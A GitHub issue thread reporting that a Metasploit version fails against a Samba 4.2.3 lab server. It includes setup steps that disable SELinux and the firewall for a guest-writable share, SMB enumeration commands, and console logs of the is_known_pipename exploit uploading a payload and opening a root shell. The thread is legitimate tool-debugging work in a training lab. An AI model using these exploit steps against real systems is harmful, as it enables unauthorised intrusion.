Open MeatBunny opened 3 years ago
adfoster-r7
commented
3 years ago @MeatBunny Thanks for the raising an issue! :+1:
Out of interest, does this work around work resolve the problem? https://github.com/rapid7/metasploit-framework/issues/14355#issuecomment-873148906
MeatBunny
commented
3 years ago @adfoster-r7 Apparently my Google-fu failed me previously. With the workaround the exploit works as expected. Thanks.
Edit: Would it be appropriate to change the default options for this particular exploit to those values or wait on a fix for the underlying issue?
adfoster-r7
commented
3 years ago @MeatBunny Thanks! That might be a good idea. Out of interest, are you running into Samba servers during pen tests? Or is this just a lab environment that you're using? Trying to get a sense for the amount of people this change would impact
MeatBunny
commented
3 years ago @adfoster-r7 This was for a training lab (teaching students 445 != Windows). It's been a few years since I was on keyboard, so this is pure opinion at this point. I probably ran into Samba machines once or twice a year, so not terribly common.
That particular exploit module probably doesn't see much use these days. I just happened to use it 4-5x in a row at the IOT CTF a few years back and thought it was a neat thing to use in a lab.
I suspect the bigger impact is that some of the auxiliary scanning modules are having the same (or similar) difficulties. Did some more testing against modern versions of Samba in CentOS 8 and Ubuntu 20.04 using the same configuration and it seems to be failing for other reasons.
EDIT: As a follow up I was talking to an individual who does engagements in the medical field and they mentioned seeing Samba running on medical IOT devices, imaging devices, network and phone appliances, and other pieces of on-prem equipment.
┌──(root💀kali)-[~]
└─# for i in {130,131,132}; do smbmap -H 172.20.8.$i; done
[+] Guest session IP: 172.20.8.130:445 Name: 172.20.8.130
Disk Permissions Comment
---- ----------- -------
share READ, WRITE Test share.
IPC$ NO ACCESS IPC Service (Testing MSF on CentOS 7.1)
[+] IP: 172.20.8.131:445 Name: 172.20.8.131
Disk Permissions Comment
---- ----------- -------
share READ, WRITE Test share.
IPC$ NO ACCESS IPC Service (Testing MSF on Ubuntu 20.04)
[+] IP: 172.20.8.132:445 Name: 172.20.8.132
Disk Permissions Comment
---- ----------- -------
share READ, WRITE Test share.
IPC$ NO ACCESS IPC Service (Testing MSF on CentOS 8.3)
┌──(root💀kali)-[~]
└─# msfconsole
Call trans opt: received. 2-19-98 13:24:18 REC:Loc
Trace program: running
wake up, Neo...
the matrix has you
follow the white rabbit.
knock, knock, Neo.
(`. ,-,
` `. ,;' /
`. ,'/ .'
`. X /.'
.-;--''--.._` ` (
.' / `
, ` ' Q '
, , `._ \
,.| ' `-.;_'
: . ` ; ` ` --,.._;
' ` , ) .'
`._ , ' /_
; ,''-,;' ``-
``-..__``--`
https://metasploit.com
=[ metasploit v6.0.52-dev ]
+ -- --=[ 2147 exploits - 1143 auxiliary - 365 post ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: Use help <command> to learn more
about any command
msf6 > setg verbose true
verbose => true
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > show options
Module options (auxiliary/scanner/smb/smb_version):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
THREADS 1 yes The number of concurrent threads (max one per host)
msf6 auxiliary(scanner/smb/smb_version) > setg RHOSTS 172.20.8.130 172.20.8.131 172.20.8.132
RHOSTS => 172.20.8.130 172.20.8.131 172.20.8.132
msf6 auxiliary(scanner/smb/smb_version) > run
[*] 172.20.8.130:445 - Force SMB1 since SMB fingerprint needs native_lm/native_os information
[*] 172.20.8.130:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0) (signatures:optional) (guid:{746e6563-736f-0037-0000-000000000000}) (authentication domain:CENTOS7)
[*] 172.20.8.130:445 - Host could not be identified: Windows 6.1 (Samba 4.2.3)
[*] Scanned 1 of 3 hosts (33% complete)
[*] 172.20.8.131:445 - Force SMB1 since SMB fingerprint needs native_lm/native_os information
[*] 172.20.8.131:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{30326275-3430-0000-0000-000000000000}) (authentication domain:UB2004)
[*] 172.20.8.131:445 - Host could not be identified
[*] Scanned 2 of 3 hosts (66% complete)
[*] 172.20.8.132:445 - Force SMB1 since SMB fingerprint needs native_lm/native_os information
[*] Scanned 2 of 3 hosts (66% complete)
[*] Scanned 2 of 3 hosts (66% complete)
[*] 172.20.8.132:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:) (encryption capabilities:AES-128-GCM) (signatures:optional) (guid:{746e6563-736f-0038-0000-000000000000}) (authentication domain:CENTOS8)
[*] 172.20.8.132:445 - Host could not be identified
[*] Scanned 3 of 3 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/smb/smb_enumshares
msf6 auxiliary(scanner/smb/smb_enumshares) > run
[-] 172.20.8.130:139 - Error: '172.20.8.130' 'RubySMB::Error::EncryptionError' 'Communication error with the remote host: Socket read returned nil. The server supports encryption but was not able to handle the encrypted request.'
[-] 172.20.8.130:445 - Error: '172.20.8.130' 'RubySMB::Error::EncryptionError' 'Communication error with the remote host: Socket read returned nil. The server supports encryption but was not able to handle the encrypted request.'
[*] Scanned 1 of 3 hosts (33% complete)
[-] 172.20.8.131:139 - Login Failed: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information.
[-] 172.20.8.131:445 - Login Failed: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information.
[*] Scanned 2 of 3 hosts (66% complete)
[*] Scanned 2 of 3 hosts (66% complete)
[-] 172.20.8.132:139 - Login Failed: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information.
[*] Scanned 2 of 3 hosts (66% complete)
[-] 172.20.8.132:445 - Login Failed: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information.
[*] Scanned 3 of 3 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_enumshares) > set SMB::AlwaysEncrypt false
SMB::AlwaysEncrypt => false
msf6 auxiliary(scanner/smb/smb_enumshares) > run
[-] 172.20.8.130:139 - Error: '172.20.8.130' 'RubySMB::Error::UnexpectedStatusCode' 'The server responded with an unexpected status code: STATUS_ACCESS_DENIED'
[-] 172.20.8.130:445 - Error: '172.20.8.130' 'RubySMB::Error::UnexpectedStatusCode' 'The server responded with an unexpected status code: STATUS_ACCESS_DENIED'
[*] Scanned 1 of 3 hosts (33% complete)
[-] 172.20.8.131:139 - Login Failed: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information.
[-] 172.20.8.131:445 - Login Failed: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information.
[*] Scanned 2 of 3 hosts (66% complete)
[*] Scanned 2 of 3 hosts (66% complete)
[-] 172.20.8.132:139 - Login Failed: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information.
[*] Scanned 2 of 3 hosts (66% complete)
[-] 172.20.8.132:445 - Login Failed: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information.
[*] Scanned 3 of 3 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_enumshares) > set SMB::ProtocolVersion 1,2
SMB::ProtocolVersion => 1,2
msf6 auxiliary(scanner/smb/smb_enumshares) > run
[!] 172.20.8.130:139 - peer_native_os is only available with SMB1 (current version: SMB2)
[!] 172.20.8.130:139 - peer_native_lm is only available with SMB1 (current version: SMB2)
[+] 172.20.8.130:139 - share - (DISK) Test share.
[+] 172.20.8.130:139 - IPC$ - (IPC) IPC Service (Testing MSF on CentOS 7.1)
[*] Scanned 1 of 3 hosts (33% complete)
[-] 172.20.8.131:139 - Login Failed: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information.
[-] 172.20.8.131:445 - Login Failed: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information.
[*] Scanned 2 of 3 hosts (66% complete)
[*] Scanned 2 of 3 hosts (66% complete)
[-] 172.20.8.132:139 - Login Failed: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information.
[*] Scanned 2 of 3 hosts (66% complete)
[-] 172.20.8.132:445 - Login Failed: (0xc000006d) STATUS_LOGON_FAILURE: The attempted logon is invalid. This is either due to a bad username or authentication information.
[*] Scanned 3 of 3 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_enumshares) > exit
┌──(root💀kali)-[~]
└─# mkdir /mnt/{130,131,132}
┌──(root💀kali)-[~]
└─# for i in {130,131,132}; do mount -t cifs -o guest //172.20.8.$i/share /mnt/$i ; ls -la /mnt/$i; done
total 4
drwxr-xr-x 2 root root 0 Jul 22 17:27 .
drwxr-xr-x 5 root root 4096 Jul 22 17:38 ..
-rwxr-xr-x 1 root root 0 Jul 22 17:08 shared_file_130
total 4
drwxr-xr-x 2 root root 0 Jul 22 17:27 .
drwxr-xr-x 5 root root 4096 Jul 22 17:38 ..
-rwxr-xr-x 1 root root 0 Jul 22 17:06 shared_file_131
total 4
drwxr-xr-x 2 root root 0 Jul 22 17:36 .
drwxr-xr-x 5 root root 4096 Jul 22 17:38 ..
-rwxr-xr-x 1 root root 0 Jul 22 17:07 shared_file_132
github-actions[bot]
commented
2 years ago Hi!
This issue has been left open with no activity for a while now.
We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
MeatBunny
commented
2 years ago @adfoster-r7 Should this issue be kept open? Not sure how much of an edge case it is.
adfoster-r7
commented
2 years ago Thanks! Will keep it open until the issue is fixed :+1:
Description
Metasploit v6.0.52-dev throws Ruby errors when attempting to connect to a Samba 4.2.3 server where previously Metasploit 4.16.48-dev worked without issue. This was tested with both the
smb_enumsharesmodule and theis_known_pipenameexploit.Steps to reproduce
[share] path = /srv/share comment = Test share. read only = no guest ok = yes browsable = yes public = yes EOF
Disable SELinux
sed -i 's/SELINUX=enforcing/SELINUX=disabled/g' /etc/selinux/config mkdir /srv/share chmod 777 /srv/share systemctl disable firewalld systemctl stop firewalld systemctl mask firewalld iptables -L -v -n testparm systemctl enable smb
Reboot to disable SELinux
reboot ss -antp | grep 445 && systemctl status smb && ip a
msf > setg verbose true verbose => true msf > setg RHOSTS 172.20.8.130 RHOSTS => 172.20.8.130 msf > setg RHOST 172.20.8.130 RHOST => 172.20.8.130 msf > use auxiliary/scanner/smb/smb_enumshares msf auxiliary(scanner/smb/smb_enumshares) > show options
Module options (auxiliary/scanner/smb/smb_enumshares):
Name Current Setting Required Description
LogSpider 3 no 0 = disabled, 1 = CSV, 2 = table (txt), 3 = one liner (txt) (Accepted: 0, 1, 2, 3) MaxDepth 999 yes Max number of subdirectories to spider Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 172.20.8.130 yes The target address range or CIDR identifier SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as ShowFiles false yes Show detailed information when spidering SpiderProfiles true no Spider only user profiles when share = C$ SpiderShares false no Spider shares recursively THREADS 1 yes The number of concurrent threads
msf auxiliary(scanner/smb/smb_enumshares) > run
[+] 172.20.8.130:139 - share - (DS) Test share. [+] 172.20.8.130:139 - IPC$ - (I) IPC Service (Testing is_known_pipename exploit.) [] 172.20.8.130: - Scanned 1 of 1 hosts (100% complete) [] Auxiliary module execution completed msf auxiliary(scanner/smb/smb_enumshares) > use exploit/linux/samba/is_known_pipename msf exploit(linux/samba/is_known_pipename) > show options
Module options (exploit/linux/samba/is_known_pipename):
Name Current Setting Required Description
RHOST 172.20.8.130 yes The target address RPORT 445 yes The SMB service port (TCP) SMB_FOLDER no The directory to use within the writeable SMB share SMB_SHARE_NAME no The name of the SMB share containing a writeable directory
Exploit target:
Id Name
0 Automatic (Interact)
msf exploit(linux/samba/is_known_pipename) > exploit
[] 172.20.8.130:445 - Using location \172.20.8.130\share\ for the path [] 172.20.8.130:445 - Retrieving the remote path of the share 'share' [] 172.20.8.130:445 - Share 'share' has server-side path '/srv/share [] 172.20.8.130:445 - Using payload wrapper 'samba-root-findsock-x86_64'... [] 172.20.8.130:445 - Uploaded payload to \172.20.8.130\share\gLbZJPxB.so [] 172.20.8.130:445 - Loading the payload from server-side path /srv/share/gLbZJPxB.so using \PIPE\/srv/share/gLbZJPxB.so... [-] 172.20.8.130:445 - >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND [] 172.20.8.130:445 - Loading the payload from server-side path /srv/share/gLbZJPxB.so using /srv/share/gLbZJPxB.so... [+] 172.20.8.130:445 - Probe response indicates the interactive payload was loaded... [] Found shell. [*] Command shell session 1 opened (172.20.8.129:36343 -> 172.20.8.130:445) at 2021-07-13 12:47:09 -0400 uname -a
Linux is-known-pipename 3.10.0-327.el7.x86_64 #1 SMP Thu Nov 19 22:10:57 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux cat /etc/os-release NAME="CentOS Linux" VERSION="7 (Core)" ID="centos" ID_LIKE="rhel fedora" VERSION_ID="7" PRETTY_NAME="CentOS Linux 7 (Core)" ANSI_COLOR="0;31" CPE_NAME="cpe:/o:centos:centos:7" HOME_URL="https://www.centos.org/" BUG_REPORT_URL="https://bugs.centos.org/"
CENTOS_MANTISBT_PROJECT="CentOS-7" CENTOS_MANTISBT_PROJECT_VERSION="7" REDHAT_SUPPORT_PRODUCT="centos" REDHAT_SUPPORT_PRODUCT_VERSION="7"
rpm -qi samba Name : samba Epoch : 0 Version : 4.2.3 Release : 10.el7 Architecture: x86_64 Install Date: Tue Jul 13 12:27:41 2021 Group : System Environment/Daemons Size : 1844670 License : GPLv3+ and LGPLv3+ Signature : RSA/SHA256, Wed Nov 25 10:38:00 2015, Key ID 24c6a8a7f4a80eb5 Source RPM : samba-4.2.3-10.el7.src.rpm Build Date : Fri Nov 20 13:28:13 2015 Build Host : worker1.bsys.centos.org Relocations : (not relocatable) Packager : CentOS BuildSystem http://bugs.centos.org Vendor : CentOS URL : http://www.samba.org/ Summary : Server and Client software to interoperate with Windows machines Description : Samba is the standard Windows interoperability suite of programs for Linux and Unix.
Metasploit tip: Tired of setting RHOSTS for modules? Try globally setting it with setg RHOSTS x.x.x.x
msf6 > setg verbose true verbose => true msf6 > setg RHOSTS 172.20.8.130 RHOSTS => 172.20.8.130 msf6 > setg RHOST 172.20.8.130 RHOST => 172.20.8.130 msf6 > use auxiliary/scanner/smb/smb_enumshares msf6 auxiliary(scanner/smb/smb_enumshares) > show options
Module options (auxiliary/scanner/smb/smb_enumshares):
Name Current Setting Required Description
LogSpider 3 no 0 = disabled, 1 = CSV, 2 = table (txt), 3 = one liner (txt) (Accepted: 0, 1, 2, 3) MaxDepth 999 yes Max number of subdirectories to spider RHOSTS 172.20.8.130 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
ShowFiles false yes Show detailed information when spidering
SpiderProfiles true no Spider only user profiles when share = C$
SpiderShares false no Spider shares recursively
THREADS 1 yes The number of concurrent threads (max one per host)
msf6 auxiliary(scanner/smb/smb_enumshares) > run
[-] 172.20.8.130:139 - Error: '172.20.8.130' 'RubySMB::Error::EncryptionError' 'Communication error with the remote host: Socket read returned nil. The server supports encryption but was not able to handle the encrypted request.' [-] 172.20.8.130:445 - Error: '172.20.8.130' 'RubySMB::Error::EncryptionError' 'Communication error with the remote host: Socket read returned nil. The server supports encryption but was not able to handle the encrypted request.' [] 172.20.8.130: - Scanned 1 of 1 hosts (100% complete) [] Auxiliary module execution completed msf6 auxiliary(scanner/smb/smb_enumshares) > set SMB::AlwaysEncrypt false SMB::AlwaysEncrypt => false msf6 auxiliary(scanner/smb/smb_enumshares) > run
[-] 172.20.8.130:139 - Error: '172.20.8.130' 'RubySMB::Error::UnexpectedStatusCode' 'The server responded with an unexpected status code: STATUS_ACCESS_DENIED' [-] 172.20.8.130:445 - Error: '172.20.8.130' 'RubySMB::Error::UnexpectedStatusCode' 'The server responded with an unexpected status code: STATUS_ACCESS_DENIED' [] 172.20.8.130: - Scanned 1 of 1 hosts (100% complete) [] Auxiliary module execution completed msf6 auxiliary(scanner/smb/smb_enumshares) > use exploit/linux/samba/is_known_pipename [*] No payload configured, defaulting to cmd/unix/interact msf6 exploit(linux/samba/is_known_pipename) > show options
Module options (exploit/linux/samba/is_known_pipename):
Name Current Setting Required Description
RHOSTS 172.20.8.130 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
RPORT 445 yes The SMB service port (TCP)
SMB_FOLDER no The directory to use within the writeable SMB share
SMB_SHARE_NAME no The name of the SMB share containing a writeable directory
Payload options (cmd/unix/interact):
Name Current Setting Required Description
Exploit target:
Id Name
0 Automatic (Interact)
msf6 exploit(linux/samba/is_known_pipename) > exploit
[-] 172.20.8.130:445 - Exploit failed: RubySMB::Error::EncryptionError Communication error with the remote host: Socket read returned nil. The server supports encryption but was not able to handle the encrypted request. [*] Exploit completed, but no session was created. msf6 exploit(linux/samba/is_known_pipename) > set SMB::AlwaysEncrypt false SMB::AlwaysEncrypt => false msf6 exploit(linux/samba/is_known_pipename) > exploit
[-] 172.20.8.130:445 - Exploit failed [no-access]: RubySMB::Error::UnexpectedStatusCode The server responded with an unexpected status code: STATUS_ACCESS_DENIED [*] Exploit completed, but no session was created. msf6 exploit(linux/samba/is_known_pipename) >
[05/19/2021 11:18:32] [d(0)] core: Created user based module store [07/13/2021 12:49:15] [d(0)] core: Updated user based module store [07/13/2021 12:49:18] [d(0)] core: HistoryManager.push_context name: :msfconsole [07/13/2021 12:52:03] [d(0)] core: HistoryManager.pop_context name: :msfconsole [07/13/2021 12:52:08] [d(0)] core: HistoryManager.push_context name: :msfconsole [07/13/2021 12:52:51] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3] [07/13/2021 12:52:56] [d(0)] core: Negotiated SMB version: SMB3 [07/13/2021 12:52:58] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3] [07/13/2021 12:53:02] [d(0)] core: Negotiated SMB version: SMB3 [07/13/2021 12:53:15] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3] [07/13/2021 12:53:19] [d(0)] core: Negotiated SMB version: SMB3 [07/13/2021 12:53:21] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3] [07/13/2021 12:53:25] [d(0)] core: Negotiated SMB version: SMB3 [07/13/2021 12:54:32] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3] [07/13/2021 12:54:36] [d(0)] core: Negotiated SMB version: SMB3 [07/13/2021 12:54:38] [e(0)] core: Exploit failed (linux/samba/is_known_pipename): RubySMB::Error::EncryptionError Communication error with the remote host: Socket read returned nil. The server supports encryption but was not able to handle the encrypted request. - RubySMB::Error::EncryptionError Communication error with the remote host: Socket read returned nil. The server supports encryption but was not able to handle the encrypted request. [07/13/2021 12:54:44] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3] [07/13/2021 12:54:48] [d(0)] core: Negotiated SMB version: SMB3 [07/13/2021 12:54:50] [e(0)] core: Exploit failed (linux/samba/is_known_pipename): RubySMB::Error::UnexpectedStatusCode The server responded with an unexpected status code: STATUS_ACCESS_DENIED - RubySMB::Error::UnexpectedStatusCode The server responded with an unexpected status code: STATUS_ACCESS_DENIED